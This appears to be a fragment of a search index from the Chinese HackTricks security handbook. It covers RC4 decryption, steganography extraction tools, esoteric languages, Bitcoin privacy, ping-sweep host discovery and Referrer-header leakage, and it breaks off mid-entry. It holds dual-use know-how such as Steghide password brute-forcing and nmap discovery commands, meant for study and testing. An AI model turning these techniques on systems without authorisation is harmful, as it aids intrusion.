学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Padding Oracle » 参考","id":"10147","title":"参考"},"10148":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果你能以某种方式使用 RC4 加密明文,你可以仅使用加密函数解密任何使用相同密码加密的内容。 如果你能加密已知的明文,你也可以提取密码。更多参考资料可以在 HTB Kryptos 机器中找到: Hack The Box - Kryptos - 0xRick\\\\xe2\\\\x80\\\\x99s Blog Hack The Box - Kryptos - 0xRick\\\\xe2\\\\x80\\\\x99s Blog tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"RC4 - Encrypt&Decrypt » RC4 加密和解密","id":"10148","title":"RC4 加密和解密"},"10149":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Stego Tricks » Stego Tricks","id":"10149","title":"Stego Tricks"},"1015":{"body":"PayJoin (或P2EP)是CoinJoin的一种变体,在两个参与方(例如,客户和商家)之间伪装交易为常规交易,而没有CoinJoin特有的相等输出特征。这使得检测变得极其困难,并可能使交易监控实体使用的共同输入所有权启发式失效。 plaintext 2 btc --> 3 btc\\n5 btc 4 btc 像上面这样的交易可能是 PayJoin,增强隐私,同时与标准比特币交易无异。 PayJoin 的使用可能会显著破坏传统监控方法 ,使其在追求交易隐私方面成为一个有前景的发展。","breadcrumbs":"Blockchain & Crypto » PayJoin","id":"1015","title":"PayJoin"},"10150":{"body":"","breadcrumbs":"Stego Tricks » 从文件中提取数据","id":"10150","title":"从文件中提取数据"},"10151":{"body":"一个用于搜索二进制文件中嵌入的隐藏文件和数据的工具。它通过 apt 安装,源代码可在 GitHub 上获取。 bash binwalk file # Displays the embedded data\\nbinwalk -e file # Extracts the data\\nbinwalk --dd \\".*\\" file # Extracts all data","breadcrumbs":"Stego Tricks » Binwalk","id":"10151","title":"Binwalk"},"10152":{"body":"根据文件的头部和尾部恢复文件,对 png 图像非常有用。通过 apt 安装,源代码在 GitHub 上。 bash foremost -i file # Extracts data","breadcrumbs":"Stego Tricks » Foremost","id":"10152","title":"Foremost"},"10153":{"body":"帮助查看文件元数据,访问 这里 。 bash exiftool file # Shows the metadata","breadcrumbs":"Stego Tricks » Exiftool","id":"10153","title":"Exiftool"},"10154":{"body":"类似于 exiftool,用于查看元数据。可以通过 apt 安装,源代码在 GitHub ,并且有一个 官方网站 。 bash exiv2 file # Shows the metadata","breadcrumbs":"Stego Tricks » Exiv2","id":"10154","title":"Exiv2"},"10155":{"body":"识别您正在处理的文件类型。","breadcrumbs":"Stego Tricks » 文件","id":"10155","title":"文件"},"10156":{"body":"从文件中提取可读字符串,使用各种编码设置来过滤输出。 bash strings -n 6 file # Extracts strings with a minimum length of 6\\nstrings -n 6 file | head -n 20 # First 20 strings\\nstrings -n 6 file | tail -n 20 # Last 20 strings\\nstrings -e s -n 6 file # 7bit strings\\nstrings -e S -n 6 file # 8bit strings\\nstrings -e l -n 6 file # 16bit strings (little-endian)\\nstrings -e b -n 6 file # 16bit strings (big-endian)\\nstrings -e L -n 6 file # 32bit strings (little-endian)\\nstrings -e B -n 6 file # 32bit strings (big-endian)","breadcrumbs":"Stego 
Tricks » 字符串","id":"10156","title":"字符串"},"10157":{"body":"用于将修改过的文件与在线找到的原始版本进行比较。 bash cmp original.jpg stego.jpg -b -l","breadcrumbs":"Stego Tricks » 比较 (cmp)","id":"10157","title":"比较 (cmp)"},"10158":{"body":"","breadcrumbs":"Stego Tricks » 提取文本中的隐藏数据","id":"10158","title":"提取文本中的隐藏数据"},"10159":{"body":"看似空白的空间中的不可见字符可能隐藏着信息。要提取这些数据,请访问 https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder 。","breadcrumbs":"Stego Tricks » 空格中的隐藏数据","id":"10159","title":"空格中的隐藏数据"},"1016":{"body":"","breadcrumbs":"Blockchain & Crypto » 加密货币隐私的最佳实践","id":"1016","title":"加密货币隐私的最佳实践"},"10160":{"body":"","breadcrumbs":"Stego Tricks » 从图像中提取数据","id":"10160","title":"从图像中提取数据"},"10161":{"body":"GraphicMagick 用于确定图像文件类型并识别潜在的损坏。执行以下命令以检查图像: bash ./magick identify -verbose stego.jpg 要尝试修复损坏的图像,添加元数据注释可能会有所帮助: bash ./magick mogrify -set comment \'Extraneous bytes removed\' stego.jpg","breadcrumbs":"Stego Tricks » 使用 GraphicMagick 识别图像细节","id":"10161","title":"使用 GraphicMagick 识别图像细节"},"10162":{"body":"Steghide 方便地在 JPEG, BMP, WAV, 和 AU 文件中隐藏数据,能够嵌入和提取加密数据。使用 apt 安装非常简单,其 源代码可在 GitHub 上获取 。 命令: steghide info file 显示文件是否包含隐藏数据。 steghide extract -sf file [--passphrase password] 提取隐藏数据,密码可选。 要进行基于网页的提取,请访问 此网站 。 使用 Stegcracker 进行暴力破解攻击: 要尝试对 Steghide 进行密码破解,请使用 stegcracker 如下: bash stegcracker []","breadcrumbs":"Stego Tricks » Steghide用于数据隐藏","id":"10162","title":"Steghide用于数据隐藏"},"10163":{"body":"zsteg专注于揭示PNG和BMP文件中的隐藏数据。安装通过gem install zsteg完成,其 源代码在GitHub上 。 命令: zsteg -a file对文件应用所有检测方法。 zsteg -E file指定用于数据提取的有效载荷。","breadcrumbs":"Stego Tricks » zsteg用于PNG和BMP文件","id":"10163","title":"zsteg用于PNG和BMP文件"},"10164":{"body":"stegoVeritas 检查元数据,执行图像转换,并应用LSB暴力破解等功能。使用stegoveritas.py -h获取完整选项列表,使用stegoveritas.py stego.jpg执行所有检查。 Stegsolve 应用各种颜色滤镜以揭示图像中的隐藏文本或消息。它可在 GitHub上 获取。","breadcrumbs":"Stego Tricks » StegoVeritas和Stegsolve","id":"10164","title":"StegoVeritas和Stegsolve"},"10165":{"body":"快速傅里叶变换(FFT)技术可以揭示图像中的隐蔽内容。实用资源包括: EPFL演示 Ejectamenta 
GitHub上的FFTStegPic","breadcrumbs":"Stego Tricks » FFT用于隐藏内容检测","id":"10165","title":"FFT用于隐藏内容检测"},"10166":{"body":"Stegpy允许将信息嵌入图像和音频文件,支持PNG、BMP、GIF、WebP和WAV等格式。它可在 GitHub上 获取。","breadcrumbs":"Stego Tricks » Stegpy用于音频和图像文件","id":"10166","title":"Stegpy用于音频和图像文件"},"10167":{"body":"要分析PNG文件或验证其真实性,请使用: bash apt-get install pngcheck\\npngcheck stego.png","breadcrumbs":"Stego Tricks » Pngcheck用于PNG文件分析","id":"10167","title":"Pngcheck用于PNG文件分析"},"10168":{"body":"要进一步探索,请考虑访问: Magic Eye Solver Image Error Level Analysis Outguess OpenStego DIIT","breadcrumbs":"Stego Tricks » 图像分析的附加工具","id":"10168","title":"图像分析的附加工具"},"10169":{"body":"音频隐写术 提供了一种独特的方法,将信息隐藏在声音文件中。使用不同的工具来嵌入或检索隐藏的内容。","breadcrumbs":"Stego Tricks » 从音频中提取数据","id":"10169","title":"从音频中提取数据"},"1017":{"body":"为了维护隐私和安全,与区块链同步钱包至关重要。有两种方法脱颖而出: 全节点 :通过下载整个区块链,全节点确保最大隐私。所有曾经进行的交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。 客户端区块过滤 :此方法涉及为区块链中的每个区块创建过滤器,使钱包能够识别相关交易,而不向网络观察者暴露特定兴趣。轻量级钱包下载这些过滤器,仅在找到与用户地址匹配时才获取完整区块。","breadcrumbs":"Blockchain & Crypto » 钱包同步技术","id":"1017","title":"钱包同步技术"},"10170":{"body":"Steghide是一个多功能工具,旨在将数据隐藏在JPEG、BMP、WAV和AU文件中。详细说明请参见 stego tricks documentation 。","breadcrumbs":"Stego Tricks » Steghide (JPEG, BMP, WAV, AU)","id":"10170","title":"Steghide (JPEG, BMP, WAV, AU)"},"10171":{"body":"该工具兼容多种格式,包括PNG、BMP、GIF、WebP和WAV。有关更多信息,请参阅 Stegpy\'s section 。","breadcrumbs":"Stego Tricks » Stegpy (PNG, BMP, GIF, WebP, WAV)","id":"10171","title":"Stegpy (PNG, BMP, GIF, WebP, WAV)"},"10172":{"body":"ffmpeg对于评估音频文件的完整性至关重要,突出详细信息并指出任何差异。 bash ffmpeg -v info -i stego.mp3 -f null -","breadcrumbs":"Stego Tricks » ffmpeg","id":"10172","title":"ffmpeg"},"10173":{"body":"WavSteg 擅长使用最低有效位策略在 WAV 文件中隐藏和提取数据。它可以在 GitHub 上获取。命令包括: bash python3 WavSteg.py -r -b 1 -s soundfile -o outputfile python3 WavSteg.py -r -b 2 -s soundfile -o outputfile","breadcrumbs":"Stego Tricks » WavSteg (WAV)","id":"10173","title":"WavSteg (WAV)"},"10174":{"body":"Deepsound 允许使用 AES-256 对声音文件中的信息进行加密和检测。可以从 the official page 
下载。","breadcrumbs":"Stego Tricks » Deepsound","id":"10174","title":"Deepsound"},"10175":{"body":"Sonic Visualizer 是一个用于音频文件的视觉和分析检查的宝贵工具,可以揭示其他方法无法检测到的隐藏元素。访问 official website 了解更多信息。","breadcrumbs":"Stego Tricks » Sonic Visualizer","id":"10175","title":"Sonic Visualizer"},"10176":{"body":"通过在线工具可以检测音频文件中的 DTMF 音调,例如 this DTMF detector 和 DialABC 。","breadcrumbs":"Stego Tricks » DTMF Tones - Dial Tones","id":"10176","title":"DTMF Tones - Dial Tones"},"10177":{"body":"","breadcrumbs":"Stego Tricks » Other Techniques","id":"10177","title":"Other Techniques"},"10178":{"body":"平方为整数的二进制数据可能表示 QR 码。使用此代码片段进行检查: python import math\\nmath.sqrt(2500) #50 对于二进制到图像的转换,请查看 dcode 。要读取二维码,请使用 this online barcode reader 。","breadcrumbs":"Stego Tricks » Binary Length SQRT - QR Code","id":"10178","title":"Binary Length SQRT - QR Code"},"10179":{"body":"对于盲文翻译, Branah Braille Translator 是一个很好的资源。","breadcrumbs":"Stego Tricks » 盲文翻译","id":"10179","title":"盲文翻译"},"1018":{"body":"鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络交互时增强隐私。","breadcrumbs":"Blockchain & Crypto » 利用 Tor 实现匿名性","id":"1018","title":"利用 Tor 实现匿名性"},"10180":{"body":"https://0xrick.github.io/lists/stego/ https://github.com/DominicBreuker/stego-toolkit tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Stego Tricks » 参考文献","id":"10180","title":"参考文献"},"10181":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esoteric languages » Esoteric languages","id":"10181","title":"Esoteric languages"},"10182":{"body":"查看该维基以搜索更多晦涩语言","breadcrumbs":"Esoteric languages » Esolangs Wiki","id":"10182","title":"Esolangs Wiki"},"10183":{"body":"(\'&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}= http://malbolge.doleczek.pl/","breadcrumbs":"Esoteric languages » Malbolge","id":"10183","title":"Malbolge"},"10184":{"body":"https://www.bertnase.de/npiet/npiet-execute.php","breadcrumbs":"Esoteric languages » npiet","id":"10184","title":"npiet"},"10185":{"body":"Midnight takes your heart and your soul\\nWhile your heart is as high as your soul\\nPut your heart without your soul into your heart Give back your heart Desire is a lovestruck ladykiller\\nMy world is nothing\\nFire is ice\\nHate is water\\nUntil my world is Desire,\\nBuild my world up\\nIf Midnight taking my world, Fire is nothing and Midnight taking my world, Hate is nothing\\nShout \\"FizzBuzz!\\"\\nTake it to the top If Midnight taking my world, Fire is nothing\\nShout \\"Fizz!\\"\\nTake it to the top If Midnight taking my world, Hate is nothing\\nSay \\"Buzz!\\"\\nTake it to the top Whisper my world https://codewithrockstar.com/","breadcrumbs":"Esoteric languages » Rockstar","id":"10185","title":"Rockstar"},"10186":{"body":"KoKoKoKoKoKoKoKoKoKo Kud-Kudah\\nKoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah\\nKoKoKo Kud-Kudah\\nkOkOkOkO kudah kO kud-Kudah Ko Kukarek kudah\\nKoKoKoKo Kud-Kudah KoKoKoKo kudah kO kud-Kudah kO Kukarek\\nkOkOkOkOkO Kukarek Kukarek kOkOkOkOkOkOkO\\nKukarek tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esoteric languages » PETOOH","id":"10186","title":"PETOOH"},"10187":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 智能合约 被定义为在区块链上执行的程序,当满足特定条件时,自动化协议执行,无需中介。 去中心化应用(dApps) 基于智能合约构建,具有用户友好的前端和透明、可审计的后端。 代币与币 区分开来,币作为数字货币,而代币在特定上下文中代表价值或所有权。 实用代币 授予对服务的访问权限, 安全代币 表示资产所有权。 DeFi 代表去中心化金融,提供无中央权威的金融服务。 DEX 和 DAO 分别指去中心化交易平台和去中心化自治组织。","breadcrumbs":"Blockchain & Crypto Currencies » 基本概念","id":"10187","title":"基本概念"},"10188":{"body":"共识机制确保区块链上安全和一致的交易验证: 工作量证明(PoW) 依赖计算能力进行交易验证。 权益证明(PoS) 要求验证者持有一定数量的代币,相较于PoW减少能耗。","breadcrumbs":"Blockchain & Crypto Currencies » 共识机制","id":"10188","title":"共识机制"},"10189":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 比特币基础知识","id":"10189","title":"比特币基础知识"},"1019":{"body":"为了保护隐私,使用新地址进行每笔交易至关重要。重用地址可能会通过将交易链接到同一实体而危及隐私。现代钱包通过其设计来阻止地址重用。","breadcrumbs":"Blockchain & Crypto » 防止地址重用","id":"1019","title":"防止地址重用"},"10190":{"body":"比特币交易涉及在地址之间转移资金。交易通过数字签名进行验证,确保只有私钥的拥有者可以发起转账。 关键组件: 多重签名交易 需要多个签名来授权交易。 交易由 输入 (资金来源)、 输出 (目的地)、 费用 (支付给矿工)和 脚本 (交易规则)组成。","breadcrumbs":"Blockchain & Crypto Currencies » 交易","id":"10190","title":"交易"},"10191":{"body":"旨在通过允许在一个通道内进行多笔交易来增强比特币的可扩展性,仅将最终状态广播到区块链。","breadcrumbs":"Blockchain & Crypto Currencies » 闪电网络","id":"10191","title":"闪电网络"},"10192":{"body":"隐私攻击,如 共同输入所有权 和 UTXO找零地址检测 ,利用交易模式。策略如 混合器 和 CoinJoin 通过模糊用户之间的交易链接来提高匿名性。","breadcrumbs":"Blockchain & Crypto Currencies » 比特币隐私问题","id":"10192","title":"比特币隐私问题"},"10193":{"body":"方法包括现金交易、挖矿和使用混合器。 CoinJoin 混合多笔交易以复杂化可追溯性,而 PayJoin 将CoinJoins伪装成常规交易以增强隐私。","breadcrumbs":"Blockchain & Crypto Currencies » 
匿名获取比特币","id":"10193","title":"匿名获取比特币"},"10194":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 比特币隐私攻击","id":"10194","title":"比特币隐私攻击"},"10195":{"body":"在比特币的世界中,交易的隐私和用户的匿名性常常是关注的主题。以下是攻击者可能通过几种常见方法破坏比特币隐私的简化概述。","breadcrumbs":"Blockchain & Crypto Currencies » 比特币隐私攻击总结","id":"10195","title":"比特币隐私攻击总结"},"10196":{"body":"由于涉及的复杂性,不同用户的输入在单笔交易中组合的情况通常很少。因此, 同一交易中的两个输入地址通常被假定属于同一所有者 。","breadcrumbs":"Blockchain & Crypto Currencies » 共同输入所有权假设","id":"10196","title":"共同输入所有权假设"},"10197":{"body":"UTXO,或 未花费交易输出 ,必须在交易中完全花费。如果只有一部分发送到另一个地址,剩余部分将转到一个新的找零地址。观察者可以假设这个新地址属于发送者,从而损害隐私。","breadcrumbs":"Blockchain & Crypto Currencies » UTXO找零地址检测","id":"10197","title":"UTXO找零地址检测"},"10198":{"body":"为减轻此问题,混合服务或使用多个地址可以帮助模糊所有权。","breadcrumbs":"Blockchain & Crypto Currencies » 示例","id":"10198","title":"示例"},"10199":{"body":"用户有时在网上分享他们的比特币地址,使得 很容易将地址与其所有者关联 。","breadcrumbs":"Blockchain & Crypto Currencies » 社交网络与论坛曝光","id":"10199","title":"社交网络与论坛曝光"},"102":{"body":"请注意, Discovering hosts from the outside ( ICMP ) 中提到的技术也可以在这里 应用 。 但是,既然你与其他主机处于 同一网络 ,你可以做 更多事情 : If you ping a subnet broadcast address the ping should be arrive to each host and they could respond to you : ping -b 10.10.5.255 Pinging the network broadcast address you could even find hosts inside other subnets : ping -b 255.255.255.255 Use the -PE, -PP, -PM flags of nmapto perform host discovery sending respectively ICMPv4 echo , timestamp , and subnet mask requests: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24","breadcrumbs":"Pentesting Network » Active ICMP","id":"102","title":"Active ICMP"},"1020":{"body":"多笔交易 :将支付拆分为几笔交易可以模糊交易金额,从而阻止隐私攻击。 避免找零 :选择不需要找零输出的交易可以通过破坏找零检测方法来增强隐私。 多个找零输出 :如果无法避免找零,生成多个找零输出仍然可以改善隐私。","breadcrumbs":"Blockchain & Crypto » 交易隐私策略","id":"1020","title":"交易隐私策略"},"10200":{"body":"交易可以被可视化为图形,揭示基于资金流动的用户之间的潜在连接。","breadcrumbs":"Blockchain & Crypto Currencies » 交易图分析","id":"10200","title":"交易图分析"},"10201":{"body":"该启发式基于分析具有多个输入和输出的交易,以猜测哪个输出是返回给发送者的找零。","breadcrumbs":"Blockchain 
& Crypto Currencies » 不必要输入启发式(最佳找零启发式)","id":"10201","title":"不必要输入启发式(最佳找零启发式)"},"10202":{"body":"bash 2 btc --> 4 btc\\n3 btc 1 btc 如果添加更多输入使得变化输出大于任何单一输入,它可能会混淆启发式分析。","breadcrumbs":"Blockchain & Crypto Currencies » 示例","id":"10202","title":"示例"},"10203":{"body":"攻击者可能会向之前使用过的地址发送少量资金,希望收款人将这些资金与未来交易中的其他输入合并,从而将地址链接在一起。","breadcrumbs":"Blockchain & Crypto Currencies » 强制地址重用","id":"10203","title":"强制地址重用"},"10204":{"body":"钱包应避免使用在已经使用过的空地址上收到的硬币,以防止这种隐私泄露。","breadcrumbs":"Blockchain & Crypto Currencies » 正确的钱包行为","id":"10204","title":"正确的钱包行为"},"10205":{"body":"确切支付金额: 没有找零的交易很可能是在两个由同一用户拥有的地址之间进行的。 整数金额: 交易中的整数金额表明这是一次支付,而非整数输出很可能是找零。 钱包指纹识别: 不同的钱包具有独特的交易创建模式,允许分析师识别所使用的软件,并可能识别找零地址。 金额与时间相关性: 公开交易时间或金额可能使交易可追踪。","breadcrumbs":"Blockchain & Crypto Currencies » 其他区块链分析技术","id":"10205","title":"其他区块链分析技术"},"10206":{"body":"通过监控网络流量,攻击者可以潜在地将交易或区块与IP地址关联,从而危及用户隐私。如果一个实体运营多个比特币节点,这种情况尤其明显,增强了他们监控交易的能力。","breadcrumbs":"Blockchain & Crypto Currencies » 流量分析","id":"10206","title":"流量分析"},"10207":{"body":"有关隐私攻击和防御的全面列表,请访问 Bitcoin Privacy on Bitcoin Wiki 。","breadcrumbs":"Blockchain & Crypto Currencies » 更多","id":"10207","title":"更多"},"10208":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 匿名比特币交易","id":"10208","title":"匿名比特币交易"},"10209":{"body":"现金交易: 通过现金获取比特币。 现金替代品: 购买礼品卡并在线兑换比特币。 挖矿: 通过挖矿获得比特币是最私密的方法,尤其是单独进行时,因为挖矿池可能知道矿工的IP地址。 Mining Pools Information 盗窃: 理论上,盗窃比特币可能是另一种匿名获取比特币的方法,尽管这是非法的且不推荐。","breadcrumbs":"Blockchain & Crypto Currencies » 匿名获取比特币的方法","id":"10209","title":"匿名获取比特币的方法"},"1021":{"body":"门罗币满足数字交易中对绝对匿名性的需求,为隐私设定了高标准。","breadcrumbs":"Blockchain & Crypto » 门罗币:匿名性的灯塔","id":"1021","title":"门罗币:匿名性的灯塔"},"10210":{"body":"通过使用混合服务,用户可以 发送比特币 并 收到不同的比特币作为回报 ,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,以确保其不保留日志并实际返回比特币。替代的混合选项包括比特币赌场。","breadcrumbs":"Blockchain & Crypto Currencies » 混合服务","id":"10210","title":"混合服务"},"10211":{"body":"CoinJoin 将来自不同用户的多个交易合并为一个,复杂化了任何试图将输入与输出匹配的过程。尽管其有效性,具有独特输入和输出大小的交易仍然可能被追踪。 可能使用 CoinJoin 的示例交易包括 
402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a 和 85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238。 有关更多信息,请访问 CoinJoin 。有关以太坊上的类似服务,请查看 Tornado Cash ,它通过矿工的资金匿名化交易。","breadcrumbs":"Blockchain & Crypto Currencies » CoinJoin","id":"10211","title":"CoinJoin"},"10212":{"body":"PayJoin (或 P2EP)是 CoinJoin 的一种变体,它将两个参与方(例如,客户和商家)之间的交易伪装成常规交易,而没有 CoinJoin 特有的相等输出特征。这使得检测变得极其困难,并可能使交易监控实体使用的共同输入所有权启发式失效。 plaintext 2 btc --> 3 btc\\n5 btc 4 btc 像上述交易可以是 PayJoin,增强隐私,同时与标准比特币交易无区别。 PayJoin 的使用可能会显著破坏传统监控方法 ,使其成为追求交易隐私的一个有前景的发展。","breadcrumbs":"Blockchain & Crypto Currencies » PayJoin","id":"10212","title":"PayJoin"},"10213":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 加密货币隐私的最佳实践","id":"10213","title":"加密货币隐私的最佳实践"},"10214":{"body":"为了维护隐私和安全,与区块链同步钱包至关重要。有两种方法脱颖而出: 全节点 :通过下载整个区块链,全节点确保最大隐私。所有曾经进行的交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。 客户端区块过滤 :此方法涉及为区块链中的每个区块创建过滤器,使钱包能够识别相关交易,而不向网络观察者暴露特定兴趣。轻量级钱包下载这些过滤器,仅在与用户地址匹配时获取完整区块。","breadcrumbs":"Blockchain & Crypto Currencies » 钱包同步技术","id":"10214","title":"钱包同步技术"},"10215":{"body":"鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络互动时增强隐私。","breadcrumbs":"Blockchain & Crypto Currencies » 利用 Tor 实现匿名性","id":"10215","title":"利用 Tor 实现匿名性"},"10216":{"body":"为了保护隐私,使用新地址进行每笔交易至关重要。重用地址可能会通过将交易链接到同一实体而危及隐私。现代钱包通过其设计来阻止地址重用。","breadcrumbs":"Blockchain & Crypto Currencies » 防止地址重用","id":"10216","title":"防止地址重用"},"10217":{"body":"多笔交易 :将支付拆分为几笔交易可以模糊交易金额,阻碍隐私攻击。 避免找零 :选择不需要找零输出的交易可以通过干扰找零检测方法来增强隐私。 多个找零输出 :如果无法避免找零,生成多个找零输出仍然可以改善隐私。","breadcrumbs":"Blockchain & Crypto Currencies » 交易隐私策略","id":"10217","title":"交易隐私策略"},"10218":{"body":"门罗币满足数字交易中对绝对匿名性的需求,为隐私设定了高标准。","breadcrumbs":"Blockchain & Crypto Currencies » 门罗币:匿名性的灯塔","id":"10218","title":"门罗币:匿名性的灯塔"},"10219":{"body":"","breadcrumbs":"Blockchain & Crypto Currencies » 以太坊:燃料费和交易","id":"10219","title":"以太坊:燃料费和交易"},"1022":{"body":"","breadcrumbs":"Blockchain & Crypto » 以太坊:燃料费和交易","id":"1022","title":"以太坊:燃料费和交易"},"10220":{"body":"燃料费衡量在以太坊上执行操作所需的计算努力,以 
gwei 定价。例如,一笔交易的费用为 2,310,000 gwei(或 0.00231 ETH),涉及燃料限制和基本费用,并向矿工提供小费以激励他们。用户可以设置最高费用,以确保他们不会支付过多,超出部分会退还。","breadcrumbs":"Blockchain & Crypto Currencies » 理解燃料费","id":"10220","title":"理解燃料费"},"10221":{"body":"以太坊中的交易涉及发送者和接收者,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的关键信息包括接收者、发送者的签名、金额、可选数据、燃料限制和费用。值得注意的是,发送者的地址是从签名中推导出来的,因此在交易数据中不需要它。 这些实践和机制是任何希望参与加密货币,同时优先考虑隐私和安全的人的基础。","breadcrumbs":"Blockchain & Crypto Currencies » 执行交易","id":"10221","title":"执行交易"},"10222":{"body":"https://en.wikipedia.org/wiki/Proof_of_stake https://www.mycryptopedia.com/public-key-private-key-explained/ https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions https://ethereum.org/en/developers/docs/transactions/ https://ethereum.org/en/developers/docs/gas/ https://en.bitcoin.it/wiki/Privacy tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Blockchain & Crypto Currencies » 参考文献","id":"10222","title":"参考文献"},"10223":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Referrer 是浏览器用来指示上一个访问页面的头部。","breadcrumbs":"Interesting Http » 引荐头和策略","id":"10223","title":"引荐头和策略"},"10224":{"body":"如果在某个网页中,任何敏感信息位于 GET 请求参数中,如果该页面包含指向外部源的链接,或者攻击者能够使/建议(社会工程学)用户访问一个由攻击者控制的 URL。它可能能够在最新的 GET 请求中提取敏感信息。","breadcrumbs":"Interesting Http » 敏感信息泄露","id":"10224","title":"敏感信息泄露"},"10225":{"body":"您可以让浏览器遵循一个 Referrer-policy ,以 避免 将敏感信息发送到其他网络应用程序: Referrer-Policy: no-referrer\\nReferrer-Policy: no-referrer-when-downgrade\\nReferrer-Policy: origin\\nReferrer-Policy: origin-when-cross-origin\\nReferrer-Policy: same-origin\\nReferrer-Policy: strict-origin\\nReferrer-Policy: strict-origin-when-cross-origin\\nReferrer-Policy: unsafe-url","breadcrumbs":"Interesting Http » 缓解措施","id":"10225","title":"缓解措施"},"10226":{"body":"您可以使用 HTML meta 标签覆盖此规则(攻击者需要利用 HTML 注入): html \\n","breadcrumbs":"Interesting Http » 